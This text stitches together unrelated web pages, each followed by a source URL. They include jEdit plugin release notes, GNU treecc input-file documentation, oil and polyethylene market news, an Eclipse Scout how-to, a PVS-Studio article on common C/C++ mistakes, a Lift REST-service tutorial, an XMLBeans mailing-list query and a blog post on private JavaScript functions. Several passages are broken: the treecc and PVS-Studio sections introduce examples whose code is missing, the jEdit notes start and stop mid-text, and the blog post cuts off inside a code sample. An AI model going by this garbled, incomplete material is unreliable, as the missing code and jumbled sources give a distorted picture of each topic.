jEdit 4.0final and JDK 1.3 * TaskList 0.4.0: added ability to specify which modes to parse tasks for; option to 'single-click' select tasks in TaskList; added a couple new task types (XXX and FIXME:); bug fixes (case-insensitive task types didn't work, new task names weren't saved); added some validation when adding/editing new task types; new icons; updated to work with jEdit 4.1 in CVS (Token parsing changes); now requires jEdit 4.1 to compile; requires jEdit 4.0pre5 and JDK 1.3 This will be the last update for a couple weeks at least, as I am currently surrounded by boxes and am moving in two days. Have fun. -md jEdit 4.0.2 is now available from <>. This is bug fix release; everyone using 4.0 should upgrade as soon as possible. Note that jEdit 4.0.1 was never released. + Enhancements - Documentation is now generated with DocBook-XSL 1.51.1 stylesheets. + Bug Fixes - Fixed silly windows backup saving bug. - Fixed minor problem when Control-clicking characters in the text area. - Fixed print output spacing) - A few printing bugs fixed, including the notorious print output spacing problem. -. -- Slava Pestov Salutations- This evening, I added five new releases to Plugin Central. Two of these are updates of tried-and-true plugins: FTP 0.4 and TextTools 1.8.1; the other three are new to Plugin Central: FastOpen 0.4.1 by Jiger Patel, JalopyPlugin 0.3.1 by Marco Hunsicker, and MementoPlugin 0.5.0 by Greg Cooper and Michael Taft. All require a 4.0-series version of jEdit. * FastOpen 0.4.1: initial Plugin Central release; FastOpen is a plugin designed to quickly open any file in the currect project by just typing in the first few characters of the filename you want to open; added ProjectSwitcher to allow switching ProjectViewer projects from FastOpen (Warren Nicholls); added Current Project to window title; FastOpen window is no longer modal (Ken Wootton); ProjectViewer is now kept open if it is already open (Ken Wootton); invalid filenames are now highlighted in red; use with multiple views is now supported; requires jEdit 4.0pre1, ProjectViewer 1.0.2, and JDK 1.3 * FTP 0.4: implements persistent connections; bug fixes; requires jEdit 4.0pre3 and JDK 1.3 * JalopyPlugin 0.3.1: initial Plugin Central release; Jalopy is a source code formatter/beautifier/pretty printer for the Sun Java programming language; requires jEdit 4.0final, ErrorList 1.2.1, and JDK 1.3; includes Jalopy 1.0b7 * MementoPlugin 0.5.0: initial Plugin Central release; Memento is a task manager/calendar application meant to function both as a stand-alone and as a jEdit plugin; requires jEdit 4.0final and JDK 1.4 * TextTools 1.8.1: column insert now beeps when there is no selection (Nathan Tenney); column inserts can now be undone in one step (Nathan Tenney); requires jEdit 4.0pre1 and JDK 1.3 -md
http://sourceforge.net/p/jedit/mailman/jedit-announce/?viewmonth=200206
CC-MAIN-2015-06
en
refinedweb
Treecc input files consist of zero or more declarations that define nodes, operations, options, etc. The following sections describe each of these elements. Node types are defined using the ‘node’ keyword in input files. The general form of the declaration is: An identifier that is used to refer to the node type elsewhere in the treecc definition. It is also the name of the type that will be visible to the programmer in literal code blocks. An identifier that refers to the parent node type that ‘NAME’ inherits from. If ‘PNAME’ is not supplied, then ‘NAME’ is a top-level declaration. It is legal to supply a ‘PNAME’ that has not yet been defined in the input. Any combination of ‘%abstract’ and ‘%typedef’: The node type cannot be constructed by the programmer. In addition, the programmer does not need to define operation cases for this node type if all subtypes have cases associated with them. The node type is used as the common return type for node creation functions. Top-level declarations must have a ‘%typedef’ keyword. The ‘FIELDS’ part of a node declaration defines the fields that make up the node type. Each field has the following general form: The field is not used in the node's constructor. When the node is constructed, the value of this field will be undefined unless ‘VALUE’ is specified. The type that is associated with the field. Types can be declared using a subset of the C declaration syntax, augmented with some C++ and Java features. See section Types used in fields and parameters, for more information. The name to associate with the field. Treecc verifies that the field does not currently exist in this node type, or in any of its ancestor node types. The default value to assign to the field in the node's constructor. This can only be used on fields that are declared with ‘%nocreate’. The value must be enclosed in braces. For example ‘{NULL}’ would be used to initialize a field with ‘NULL’. The braces are required because the default value is expressed in the underlying source language, and can use any of the usual constant declaration features present in that language. When the output language is C, treecc creates a struct-based type called ‘NAME’ that contains the fields for ‘NAME’ and all of its ancestor classes. The type also contains some house-keeping fields that are used internally by the generated code. The following is an example: The programmer should avoid using any identifier that ends with ‘__’, because it may clash with house-keeping identifiers that are generated by treecc. When the output language is C++, Java, or C#, treecc creates a class called ‘NAME’, that inherits from the class ‘PNAME’. The field definitions for ‘NAME’ are converted into public members in the output. Types that are used in field and parameter declarations have a syntax which is subset of features found in C, C++, and Java: Types are usually followed by an identifier that names the field or parameter. The name is required for fields and is optional for parameters. For example ‘int’ is usually equivalent to ‘int x’ in parameter declarations. The following are some examples of using types: The grammar used by treecc is slightly ambiguous. The last example above declares a parameter called ‘Element’, that has type ‘const’. The programmer probably intended to declare an anonymous parameter with type ‘const Element’ instead. This ambiguity is unavoidable given that treecc is not fully aware of the underlying language's type system. When treecc sees a type that ends in a sequence of identifiers, it will always interpret the last identifier as the field or parameter name. Thus, the programmer must write the following instead: Treecc cannot declare types using the full power of C's type system. The most common forms of declarations are supported, and the rest can usually be obtained by defining a ‘typedef’ within a literal code block. See section Literal code declarations, for more information on literal code blocks. It is the responsibility of the programmer to use type constructs that are supported by the underlying programming language. Types such as ‘const char *’ will give an error when the output is compiled with a Java compiler, for example. Enumerated types are a special kind of node type that can be used by the programmer for simple values that don't require a full abstract syntax tree node. The following is an example of defining a list of the primitive machine types used in a Java virtual machine: Enumerations are useful when writing code generators and type inferencing routines. The general form is: An identifier to be used to name the enumerated type. The name must not have been previously used as a node type, an enumerated type, or an enumerated value. A comma-separated list of identifiers that name the values within the enumeration. Each of the names must be unique, and must not have been used previously as a node type, an enumerated type, or an enumerated value. Logically, each enumerated value is a special node type that inherits from a parent node type corresponding to the enumerated type ‘NAME’. When the output language is C or C++, treecc generates an enumerated typedef for ‘NAME’ that contains the enumerated values in the same order as was used in the input file. The typedef name can be used elsewhere in the code as the type of the enumeration. When the output language is Java, treecc generates a class called ‘NAME’ that contains the enumerated values as integer constants. Elsewhere in the code, the type ‘int’ must be used to declare variables of the enumerated type. Enumerated values are referred to as ‘NAME.VALUE’. If the enumerated type is used as a trigger parameter, then ‘NAME’ must be used instead of ‘int’: treecc will convert the type when the Java code is output. When the output language is C#, treecc generates an enumerated value type called ‘NAME’ that contains the enumerated values as members. The C# type ‘NAME’ can be used elsewhere in the code as the type of the enumeration. Enumerated values are referred to as ‘NAME.VALUE’. Operations are declared in two parts: the declaration, and the cases. The declaration part defines the prototype for the operation and the cases define how to handle specific kinds of nodes for the operation. Operations are defined over one or more trigger parameters. Each trigger parameter specifies a node type or an enumerated type that is selected upon to determine what course of action to take. The following are some examples of operation declarations: Trigger parameters are specified by enclosing them in square brackets. If none of the parameters are enclosed in square brackets, then treecc assumes that the first parameter is the trigger. The general form of an operation declaration is as follows: Specifies that the operation is associated with a node type as a virtual method. There must be only one trigger parameter, and it must be the first parameter. Non-virtual operations are written to the output source files as global functions. Optimise the generation of the operation code so that all cases are inline within the code for the function itself. This can only be used with non-virtual operations, and may improve code efficiency if there are lots of operation cases with a small amount of code in each. Split the generation of the multi-trigger operation code across multiple functions, to reduce the size of each individual function. It is sometimes necessary to split large %inline operations to avoid compiler limits on function size. The type of the return value for the operation. This should be ‘void’ if the operation does not have a return value. The name of the class to place the operation's definition within. This can only be used with non-virtual operations, and is intended for languages such as Java and C# that cannot declare methods outside of classes. The class name will be ignored if the output language is C. If a class name is required, but the programmer did not supply it, then ‘NAME’ will be used as the default. The exception to this is the C# language: ‘CLASS’ must always be supplied and it must be different from ‘NAME’. This is due to a "feature" in some C# compilers that forbid a method with the same name as its enclosing class. The name of the operation. The parameters to the operation. Trigger parameters may be enclosed in square brackets. Trigger parameters must be either node types or enumerated types. Once an operation has been declared, the programmer can specify its cases anywhere in the input files. It is not necessary that the cases appear after the operation, or that they be contiguous within the input files. This permits the programmer to place operation cases where they are logically required for maintainence reasons. There must be sufficient operation cases defined to cover every possible combination of node types and enumerated values that inherit from the specified trigger types. An operation case has the following general form: The name of the operation for which this case applies. A comma-separated list of node types or enumerated values that define the specific case that is handled by the following code. Source code in the output source language that implements the operation case. Multiple trigger combinations can be associated with a single block of code, by listing them all, separated by commas. For example: "(*)" is used below to indicate an option that is enabled by default. Enable the generation of code that can track the current filename and line number when nodes are created. See section Tracking line numbers in source files, for more information. (*) Disable the generation of code that performs line number tracking. Optimise the creation of singleton node types. These are node types without any fields. Treecc can optimise the code so that only one instance of a singleton node type exists in the system. This can speed up the creation of nodes for constants within compilers. (*) Singleton optimisations will have no effect if ‘track_lines’ is enabled, because line tracking uses special hidden fields in every node. Disable the optimisation of singleton node types. Enable the generation of reentrant code that does not rely upon any global variables. Separate copies of the compiler state can be used safely in separate threads. However, the same copy of the compiler state cannot be used safely in two or more threads. Disable the generation of reentrant code. The interface to node management functions is simpler, but cannot be used in a threaded environment. (*) Force output source files to be written, even if they are unchanged. This option can also be set using the ‘-f’ command-line option. Don't force output source files to be written if they are the same as before. (*) This option can help smooth integration of treecc with make. Only those output files that have changed will be modified. This reduces the number of files that the underlying source language compiler must process after treecc is executed. Use virtual methods in the node type factories, so that the programmer can subclass the factory and provide new implementations of node creation functions. This option is ignored for C, which does not use factories. Don't use virtual methods in the node type factories. (*) Use abstract virtual methods in the node type factories. The programmer is responsible for subclassing the factory to provide node creation functionality. Don't use abstract virtual methods in the node type factories. (*) Put the kind field in the node, for more efficient access at runtime. (*) Put the kind field in the vtable, and not the node. This saves some memory, at the cost of slower access to the kind value at runtime. This option only applies when the language is C. The kind field is always placed in the node in other languages, because it isn't possible to modify the vtable. Specify the prefix to be used in output files in place of "yy". Specify the name of the state type. The state type is generated by treecc to perform centralised memory management and reentrancy support. The default value is ‘YYNODESTATE’. If the output language uses factories, then this will also be the name of the factory base class. Specify the namespace to write definitions to in the output source files. This option is ignored when the output language is C. Same as ‘%option namespace = NAME’. Provided because ‘package’ is more natural for Java programmers. Specify the numeric base to use for allocating numeric values to node types. By default, node type allocation begins at 1. Specify the output language. Must be one of "C", "C++", "Java", "C#", "Ruby", "PHP", or "Python". The default is "C". Specify the size of the memory blocks to use in C and C++ node allocators. Strip filenames down to their base name in #line directives. i.e. strip off the directory component. This can be helpful in combination with the %include %readonly command when treecc input files may processed from different directories, causing common output files to change unexpectedly. Don't strip filenames in #line directives. (*) Use internal as the access mode for classes in C#, rather than public. Use public as the access mode for classes in C#, rather than internal. (*) Print #line markers in languages that use them. (*) Do not print #line markers, even in languages that normally use them. Use treecc's standard node allocator for C and C++. This option has no effect for other output languages. (*) Do not use treecc's standard node allocator for C and C++. This can be useful when the programmer wants to redirect node allocation to their own routines. Use libgc as a garbage-collecting node allocator for C and C++. This option has no effect for other output languages. Do not use libgc as a garbage-collecting node allocator for C and C++. (*) Specify the base type for the root node of the treecc node heirarchy. The default is no base type. Sometimes it is necessary to embed literal code within output ‘.h’ and source files. Usually this is to ‘#include’ definitions from other files, or to define functions that cannot be easily expressed as operations. A literal code block is specified by enclosing it in ‘%{’ and ‘%}’. The block can also be prefixed with the following flags: Write the literal code to the currently active declaration header file, instead of the source file. Write the literal code to both the currently active declaration header file and the currently active source file. Write the literal code to the end of the file, instead of the beginning. Another form of literal code block is one which begins with ‘%%’ and extends to the end of the current input file. This form implicitly has the ‘%end’ flag. Most treecc compiler definitions will be too large to be manageable in a single input file. They also will be too large to write to a single output file, because that may overload the source language compiler. Multiple input files can be specified on the command-line, or they can be explicitly included by other input files with the following declarations: Include the contents of the specified file at the current point within the current input file. ‘FILENAME’ is interpreted relative to the name of the current input file. If the ‘%readonly’ keyword is supplied, then any output files that are generated by the included file must be read-only. That is, no changes are expected by performing the inclusion. The ‘%readonly’ keyword is useful for building compilers in layers. The programmer may group a large number of useful node types and operations together that are independent of the particulars of a given language. The programmer then defines language-specific compilers that "inherit" the common definitions. Read-only inclusions ensure that any extensions that are added by the language-specific parts do not "leak" into the common code. Output files can be changed using the follow declarations: Change the currently active declaration header file to ‘FILENAME’, which is interpreted relative to the current input file. This option has no effect for languages without header files (Java and C#). Any node types and operations that are defined after a ‘%header’ declaration will be declared in ‘FILENAME’. Change the currently active source file to ‘FILENAME’, which is interpreted relative to the current input file. This option has no effect for languages that require a single class per file (Java). Any node types and operations that are defined after a ‘%header’ declaration will have their implementations placed in ‘FILENAME’. Change the output source directory to ‘DIRNAME’. This is only used for Java, which requires that a single file be used for each class. All classes are written to the specified directory. By default, ‘DIRNAME’ is the current directory where treecc was invoked. When treecc generates the output source code, it must insert several common house-keeping functions and classes into the code. By default, these are written to the first header and source files. This can be changed with the ‘%common’ declaration: Output the common house-keeping code to the currently active declaration header file and the currently active source file. This is typically used as follows: This document was generated by Klaus Treichel on January, 18 2009 using texi2html 1.78.
http://www.gnu.org/software/dotgnu/treecc/treecc_4.html
CC-MAIN-2015-06
en
refinedweb
17 August 2012 07:18 [Source: ICIS news] SINGAPORE (ICIS)--Crude futures declined on Friday, with ICE Brent futures falling more than $1/bbl amid news that the US Government is considering releasing supplies from its strategic oil reserves, while comments from the Israeli President eased ?xml:namespace> At 05:48 GMT, October Brent crude on September NYMEX light sweet crude futures (WTI) were trading at $95.10/bbl, down by 50 cents/bbl from the previous close. Earlier, the The US Government is reviewing the possibility of releasing supplies from its strategic reserves amid concerns that a rise in gasoline prices is having a negative impact on the economy and reducing the effectiveness of sanctions against Supply concerns also eased after Israeli President Peres indicated that his country would not pursue unilateral military action against However, tensions with western powers and its Arab neighbours over its nuclear programme have resulted in a tightening of sanctions against Oil prices have risen to their highest level since early May 2012 amid supply concerns generated by heightened Middle East tensions resulting from the Iranian nuclear crisis and the ongoing civil war in Brent prices have also climbed amid field maintenance which has reduced supplies
http://www.icis.com/Articles/2012/08/17/9587848/crude-falls-by-over-1bbl-on-us-potential-oil-reserves.html
CC-MAIN-2015-06
en
refinedweb
Hi, I have an XML document that looks like this: <document > <attribute type="country">Singapore</attribute> <attribute type="continent">Asia</attribute> </document> I would like to unmarshall this into a Java object that is as follows public class LocationDocument { /* accessors omitted */ public country; public continent; } Best Regards Rao (Peruri Rama Mohan Rao) T&O-ES-Imaging & Workflow Tel: 65- 6878 2071 Mobile: 65-9389 7141.
http://mail-archives.apache.org/mod_mbox/xmlbeans-user/200609.mbox/%3CBF158E64FBA6984BABB0A3D80C83B25605893D5D@W01G1BNKMBX01Y.reg1.1bank.dbs.com%3E
CC-MAIN-2015-06
en
refinedweb
Scout/HowTo/3.9 several default mappings defined: registerPart(IForm.VIEW_ID_OUTLINE, OutlineView.class.getName()); registerPart(IForm.VIEW_ID_PAGE_DETAIL, DetailView.class.getName()); ... registerPart(IForm.VIEW_ID_PAGE_SEARCH, SearchView.class.getName()); registerPart(IForm.VIEW_ID_E, EastView.class.getName()); Only the mapped displayViewIds will work out of the box. To map another IDs do this with the extension point org.eclipse.ui.perspectiveExtensions. Since this is pure eclipse RCP and has nothing to do with Scout it won't be explained in this Howto. As a start you can have a look at the already existing perspective extensions for the built in views. Opening the views Basically opening a view is the same as opening a dialog, you only have to open the form with the appropriate form handler. That's it! Opening the views in exclusive mode What you need to be aware of is that the user now has the possibility to open the same form multiple times and even the same record. To make sure that modifing the same record does not open two different views but activate the already opened one instead, you need to start the form in exclusive mode and compute an exclusive key. The following code shows how to achieve this: public class ViewHandler extends AbstractFormHandler { @Override protected void execLoad() throws ProcessingException { //open form code } @Override protected boolean getConfiguredOpenExclusive() { return true; } } public void startView() throws ProcessingException { startInternalExclusive(new DesktopForm.ViewHandler()); } @Override public Object computeExclusiveKey() throws ProcessingException { return YOUR_EXCLUSIVE_KEY; } } The exclusive key (YOUR_EXCLUSIVE_KEY) typically is the primary key of the entity but doesn't have to. With this enhancement opening forms with different exclusive keys leads to multiple views and openening forms with the same exclusive keys leads to only one view. Setting the property allowMultiple (SWT) If you would like to start your view multiple times you need to set the property allowMultiple of your ViewPart to true. This makes sure that a secondaryViewId is generated every time you open the view. Otherwise only one instance of the view is possible and opening the form leads to a warning similar to this: !MESSAGE org.eclipse.scout.rt.ui.swt.window.desktop.view.AbstractScoutView.showForm(null:-1) The view 'ID=org.eclipse.scout.demo.view.ui.swt.views.CenterView' is already open. The form 'Center (org.eclipse.scout.demo.view.client.ui.forms.DesktopForm)' can not be opened! Demo Project The demo project consists of three views: The main desktop view, a bottom and a right view.
http://wiki.eclipse.org/index.php?title=Scout/HowTo/3.9/Open_a_Form_in_a_View&oldid=342250
CC-MAIN-2015-06
en
refinedweb
Not find an interesting phenomenon occurring in the world nowadays. What happens when a software development department turns into a secondary entity not closely related to the company's basic area of activity? A forest reserve appears. However significant and critical the company's area of activity may be (say, medicine or military equipment), a small swamp appears anyway, where new ideas get stuck and 10-year old technologies are in use. Here you are a couple of extracts from the correspondence of a man working in the software development department at some nuclear power plant: And then he says, "What for do we need git? Look here, I've got it all written down in my paper notebook." ... And do you have any version control at all? 2 men use git. The rest of the team use numbered zip's at best. Though it's only 1 person with zip's I'm sure about. Don't be scared. Software developed at nuclear power plants may serve different purposes, and no one has abolished hardware security yet. In that particular department, people collect and process statistical data. Yet the tendency to swamping is pretty obvious. I don't know why it happens, but the fact is certain. What's interesting, the larger the company, the more intense the swamping effect. I want to point it out that stagnation in large companies is an international phenomenon. Things are quite the same abroad. There is an article on the subject, but I don't remember its title. I spent quite a time trying to find it, but in vain. If somebody knows it, give me the link please so that I could post it. In that article, a programmer is telling a story about him having worked at some military department. It was - naturally - awfully secret and bureaucratic - so much secret and bureaucratic that it took them several months to agree on which level of access permissions he could be granted to work on his computer. As a result, he was writing a program in Notepad (without compiling it) and was soon fired for inefficiency. Now let's get back to our ex-colleague. Having come to his new office, he was struck with kind of a cultural shock. You see, after spending so much time and effort on studying and working with static analysis tools, it's very painful to watch people ignore even compiler warnings. It's just like a separate world where they program according to their own canons and even use their own terms. The man told me some stories about it, and most of all I liked the phrase "grounded pointers" common among the local programmers. See how close they are to the hardware aspect? We are proud of having raised inside our team a skilled specialist who cares about the code quality and reliability. He hasn't silently accepted the established situation; he is trying to improve it. As a start, he did the following. He studied the compiler warnings, then checked the project with Cppcheck and considered preventing typical mistakes in addition to making some fixes. One of his first steps was preparing a paper aiming at improving the quality of the code created by the team. Introducing and integrating a static code analyzer into the development process might be the next step. It will certainly not be PVS-Studio: first, they work under Linux; second, it's very difficult to sell a software product to such companies. So, he has chosen Cppcheck for now. This tool is very fine for people to get started with the static analysis methodology. I invite you to read the paper he has prepared. It is titled "The Way You Shouldn't Write Programs". Many of the items may look written pretty much in the Captain Obvious style. However, these are real problems the man tries to address. Ignoring compiler warnings. When there are many of them in the list, you risk easily missing genuine errors in the lately written code. That's why you should address them all. In the conditional statement of the 'if' operator, a variable is assigned a value instead of being tested for this value: if (numb_numbc[i] = -1) { } The code is compiled well in this case, but the compiler produces a warning. The correct code is shown below: if (numb_numbc[i] == -1) { } The statement "using namespace std;" written in header files may cause using this namespace in all the files which include this header, which in turn may lead to calling wrong functions or occurrence of name collisions. Comparing signed variables to unsigned ones: Keep in mind that mixing signed and unsigned variables may result in: The foregoing code sample incorrectly handles the situation of the 'ba' array being empty. The expression "ba.size() - 1" evaluates to an unsigned size_t value. If the array contains no items, the expression evaluates to 0xFFFFFFFFu. Neglecting usage of constants may lead to overlooking hard-to-eliminate bugs. For example: The '=' operator is mistakenly used instead of '=='. If the 'str' variable were declared as a constant, the compiler would not even compile the code. Pointers to strings are compared instead of strings themselves: Even if the string "S" is stored in the variable TypeValue, the comparison will always return 'false'. The correct way to compare strings is to use the special functions 'strcmp' or 'strncmp'. Buffer overflow: memset(prot.ID, 0, sizeof(prot.ID) + 1); This code may cause several bytes of the memory area right after 'prot.ID' to be cleared as well. Don't mix up sizeof() and strlen(). The sizeof() operator returns the complete size of an item in bytes. The strlen() function returns the string length in characters (without counting the null terminator). Buffer underflow: In this case only N bytes will be cleared instead of the whole '*ptr' structure (N is the pointer size on the current platform). The correct way is to use the following code: Incorrect expression: if (0 < L < 2 * M_PI) { } The compiler doesn't see any error here, yet the expression is meaningless, for you will always get either 'true' or 'false' when executing it, the exact result depending on the comparison operators and boundary conditions. The compiler generates a warning for such expressions. The correct version of this code is this: if (0 < L && L < 2 * M_PI) { } Unsigned variables cannot be less than zero. Comparing a variable to a value it can never reach. For example: The compiler produces warnings against such things. Memory is allocated with the help of 'new' or 'malloc', while forgotten to be freed through 'delete'/'free' correspondingly. It may look something like this:: Memory is allocated through 'new[]' and freed through 'delete'. Or, vice versa, memory is allocated through 'new' and freed through 'delete[]'. Using uninitialized variables: In C/C++, variables are not initialized to zero by default. Sometimes code only seems to run well, which is not so - it's merely luck. A function returns a reference or pointer to local objects: On leaving the function, 'FileName' will refer to an already freed memory area, since all the local objects are created on the stack, so it's impossible to handle it correctly any further. Values returned by functions are not checked, while they may return an error code or '-1' in case of an error. It may happen that a function returns an error code, us continuing to work without noticing and reacting to it in any way, which will result in a sudden program crash at some point. Such defects take much time to debug after that. Neglecting usage of special static and dynamic analysis tools, as well as creation and usage of unit-tests. Being too greedy for adding some parentheses in math expressions, which results in the following: D = ns_vsk.bit.D_PN_ml + (int)(ns_vsk.bit.D_PN_st) << 16; In this case, addition is executed in the first place and only then left-shift is. See "Operation priorities in C/C++ ". Judging by the program logic, the order the operations must be executed in is quite reverse: shift first, then addition. A similar error occurs in the following fragment: The error here is this: the programmer forgot to enclose the TYPE macro in parentheses. This results in first executing the 'type & A' expression and only then the '(type & A ) | B' expression. As a consequence, the condition is always true. Array index out of bounds: The 'mas[3] = 4;' expression addresses a non-existing array item, since it follows from the declaration of the 'int mas[N]' array that its items can be indexed within the range [0...N-1]. Priorities of the logical operations '&&' and '||' are mixed up. The '&&' operator has a higher priority, so in this condition: if (A || B && C) { } 'B && C' will be executed first, while the rest part of the expression will be executed after that. This may not conform to the required execution logic. It's often assumed that logical expressions are executed from left to right. The compiler generates warnings for such suspicious fragments. An assigned value will have no effect outside the function: The pointer 'a' cannot be assigned a different address value. To do that, you need to declare the function in the following way: void foo(int *&a, int b) {....} or: void foo(int **a, int b) {....} I haven't drawn any specific and significant conclusions. I'm only sure that in one particular place the situation with software development is beginning to improve. And that's pleasant. On the other hand, it makes me sad that many people haven't even heard of static analysis. And these people are usually responsible for serious and important affairs. The area of programming is developing very fast. As a result, those who are constantly "working at work" fail to keep track of contemporary tendencies and tools in the industry. They eventually grow to work much less efficiently than freelance programmers and programmers engaged in startups and small companies. Thus we get a strange situation. A young freelancer can do his work better (because he has knowledge: TDD, continuous integration, static analysis, version control systems, and so on) than a programmer who has worked for 10 years at Russian Railways/nuclear power plant/… (add your variant of some large enterprise). Thank God, it's far not always like that. But still it happens. Why am I feeling sad about this? I wish we could sell PVS-Studio to them. But they don't even have a slightest suspicion about existence and usefulness of such tools. :)
http://www.cplusplus.com/articles/91wTURfi/
CC-MAIN-2015-06
en
refinedweb
26 August 2009 23:59 [Source: ICIS news] LONDON (ICIS news)--Polyethylene (PE) prices have strengthened this week due to tight supply and import pressure in both northern and southern Africa, market participants said on Wednesday. According to global chemical market intelligence service ICIS pricing, low density PE (LDPE) prices were assessed at $1,290-1,310/tonne (€903-917/tonne) CFR northern ?xml:namespace> Linear low density PE (LLDPE) was assessed at $1,260-1,280/tonne CFR, while high density PE (HDPE) was at $1,280-1,300/tonne CFR, up by $10-30/tonne from last week, according to ICIS pricing. “The increases are a result of continuing tight supply of PE in the region,” said a buyer and a seller. In southern LDPE was assessed at $1,330-1,380/tonne, LLDPE at $1,260-1,340/tonne and HDPE prices at $1,300-1,320/tonne, all on a CFR (cost and freight) southern “This is as a result of reduced availability and pressure from Middle Eastern suppliers to push up export values,” a source said. Domestic South African PE prices rose by Rand (R) 100-200 ($13-26/tonne) this week. LDPE prices were assessed at R11,600-12,700/tonne, LLDPE at R11,400-12,700/tonne and HDPE at R11,900-12,500/tonne. All prices were on a FD South Africa basis. “This is a consequence of the ongoing ethylene shortage and higher priced imports coming in,” a trader said. ($1 = €0.70/$1=R7.80) For more on polyethylene visit ICIS chemical
http://www.icis.com/Articles/2009/08/26/9243071/pe-firms-across-africa-due-to-tight-supply-import-pressure.html
CC-MAIN-2015-06
en
refinedweb
Creating a REST Service with Lift Lift provides helpers that make it easy to create a REST service with just a few lines of code. I'll provide a simple example that doesn't consider security issues. However, the required authentication checking can be added with just a few additional lines of code. This sample REST service involves games: It must list all the games and a specific required game by its ID. The restapi/game/list URI must display all the games, and if there is a long parameter with an ID such as restapi/game/list/1, the service must find this game by ID and return the results. The following listing shows the code for a new GameInformation.scala file that defines the GameInformation case class and a Singleton object with the same name. Notice that the code is included in the code.model package, which is the default package for models based on the rules I defined in Boot.scala in the previous article. You must place the file in src/main/scala. The GameInformation object defines games as a List of three GameInformation instances to include sample data to make it easy to test the REST service. The find method returns the a Box[GameInformation] with a GameInformation instance when one element in the games List matches the ID received as a parameter. package code package model import net.liftweb._ import util._ import Helpers._ import common._ case class GameInformation(id: Long, name: String, highestScore: Long) object GameInformation { var games = List( new GameInformation(1, "Invaders 2013", 7200), new GameInformation(2, "Candy Crush", 32500), new GameInformation(3, "Angry Birds", 155500)) def find(id: Long): Box[GameInformation] = synchronized { games.find(_.id == id) } } Now that I have the necessary model, I can use it in a Singleton object named GameRest, which holds the code to process and respond to the API calls. GameRest extends RestHelper and makes use of Scala's pattern matching to match incoming HTTP requests, extract the required values as part of the pattern matching process, and return the results with the necessary conversions. Notice that the code is included in the code.lib package, which is the default package for a REST API in Lift. You must place the file in src/main/scala. package code package lib import model._ import net.liftweb._ import net.liftweb.http._ import net.liftweb.http.rest._ import net.liftweb.util._ import common._ import http._ import rest._ import json._ import scala.xml._ import util._ import Helpers._ import js.JsCmds._ object GameRest extends RestHelper { serve { case "restapi" :: "game" :: "list" :: Nil Get _ => anyToJValue(listAllGames) case "restapi" :: "game" :: "list" :: AsLong(id) :: Nil Get _ => anyToJValue(listGame(id)) } def listAllGames(): List[GameInformation] = { GameInformation.games.map { game => GameInformation( game.id, game.name, game.highestScore) } } def listGame(id: Long): Box[GameInformation] = { for { game <- GameInformation.find(id) ?~ "The requested game doesn't exist" } yield GameInformation( game.id, game.name, game.highestScore) } } When Lift receives an HTTP request, it tests a PartialFunction[net.liftweb.http.Req, () => Box[net.liftweb.http.LiftResponse] to check whether it is defined. If Lift finds a match, it takes the resulting function and applies it to get a Box[net.liftweb.http.LiftResponse], then returns it when it is full. The serve method defines the request handlers: restapi/game/listwith no additional values calls the listAllGamesmethod. restapi/game/list/{id}, where {id}is a long value with the desired idcalls the listGamemethod with the received idas a parameter. For example, restapi/game/list/2calls listGame(2). The anyToJValue method is a helper method that creates JSON from case classes. The definition of the request handlers and its pattern matching is easy to understand and maintain, as shown in the following lines: serve { case "restapi" :: "game" :: "list" :: Nil Get _ => anyToJValue(listAllGames) case "restapi" :: "game" :: "list" :: AsLong(id) :: Nil Get _ => anyToJValue(listGame(id)) } Finally, it is necessary to make Lift include the GameRest object in the request processing pipeline. Thus, you must make a small change in Boot.scala. Just add the following import: import code.lib. ... Then, add the following lines within the Boot.boot method: // Make Lift include the GameRest object in the request processing pipeline LiftRules.dispatch.append(GameRest) As you might notice, it isn't necessary to list the REST URLs in Lift's SiteMap. The simple REST API is ready to process requests. The following request,, generates the response shown in the listing with all the games retrieved by the listAllGames method: [{ "id":1, "name":"Invaders 2013", "highestScore":7200 },{ "id":2, "name":"Candy Crush", "highestScore":32500 },{ "id":3, "name":"Angry Birds", "highestScore":155500 }] The following request,, results in a call to the listGame method with 2 as the id value. The following lines show the result: { "value":{ "id":2, "name":"Candy Crush", "highestScore":32500 } } The following request,, results in a call to the listGame method with 4 as the id value. There is no game that matches this idvalue; the following lines show the result: { "msg":"The requested game doesn't exist", "exception":{ }, "chain":{ } } Conclusion Lift has a very active community and it is worth taking a look at the modules it has written that provide extra features such as PayPal and Open ID integration. Before you start working on any integration or additional feature, check the information for the modules listed on. The Lift framework takes advantage of many helpful features in the Scala programming language, and the code is easy to read and maintain. Once you make the shift from MVC to Lift's ViewFirst model or after you work with a few REST APIs based on Lift, it is difficult to go back to MVC frameworks without missing the wonders of dozens of Lift's features. Gaston Hillar is a frequent contributor to Dr. Dobb's. Related Article Building Web Applications with Lift
http://www.drdobbs.com/cpp/logging-in-c/cpp/building-web-apps-with-lift-lazy-loading/240159513?pgno=3
CC-MAIN-2015-06
en
refinedweb
In Python you indicate whether a function/method is private by naming it so that it starts with an _ underscore like this: def _thisIsPrivate(): return 'a' def thisIsPublic(): return 'b' It means that if you have these two functions in a file called dummy.py and you do something like this: >>> from dummy import * >>> thisIsPublic() 'a' >>> _thisIsPrivate() Traceback (most recent call last): File "<stdin>", line 1, in ? NameError: name '_thisIsPrivate' is not defined Seems fair doesn't it. Now is there such similar naming convention and functionality in Javascript? In many of my javascript files there will be functions with the same naming convention as Python so that I can remember which functions might be used from outside and which are only relevant inside the module's scope. But that's just me and I don't think it has an actual effect other than my personal naming convention taste. The reason I'm asking is that I want to improve my slimmer with the new --hardcore option. Last month I added that if you switch on --hardcore it renames all parameters to functions from something like document_node to _1 and formname to _2. Now I want to do something similar to the functionnames too. So imagine going from: function addParameters(param1, param2) { return _fixParameter(param1) + _fixParameter(param2); } function subtractParameters(param1, param2) { return _fixParameter(param1) - _fixParameter(param2); } function _fixParameter(param) { return param.toUpperCase(); } to this much more whitespace efficient result: function addParameters(_0,_1){return _a(_0)+_a(_1);} function subtractParameters(_0,_1){return _a(_0)-_a(_1);} function _a(_0){return _0.toUpperCase();} That's a bandwidth save of 123 bytes 45%! maybe have different 'hardcore' modes? --hardcore=1 would change local names and argument names, but --hardcore=2 would slim _ named functions. Or you could allow custom regexes for the functions to allow slimming. Since JavaScript has no notion of a module, there is can be no "private" functions as used in your Python example (which aren't that private either: "from dummy import _thisIsPrivate; _thisIsPrivate()"). And I've never really seen functions beginning with underscores outside of OO-like programming (where technically private functions are possible:). As for your slimmer: what about simply testing for the existence of a function of the slimmed name first? And for inspiration, you might want to have a look at other products with the same functionality (). That's a very interesting read. I figured what one can do is to relabel all functions that are repeated by generating new code in the slimmer. So if you start with this code:: function parseSomething(z) { ... } function foo(x, y) { return 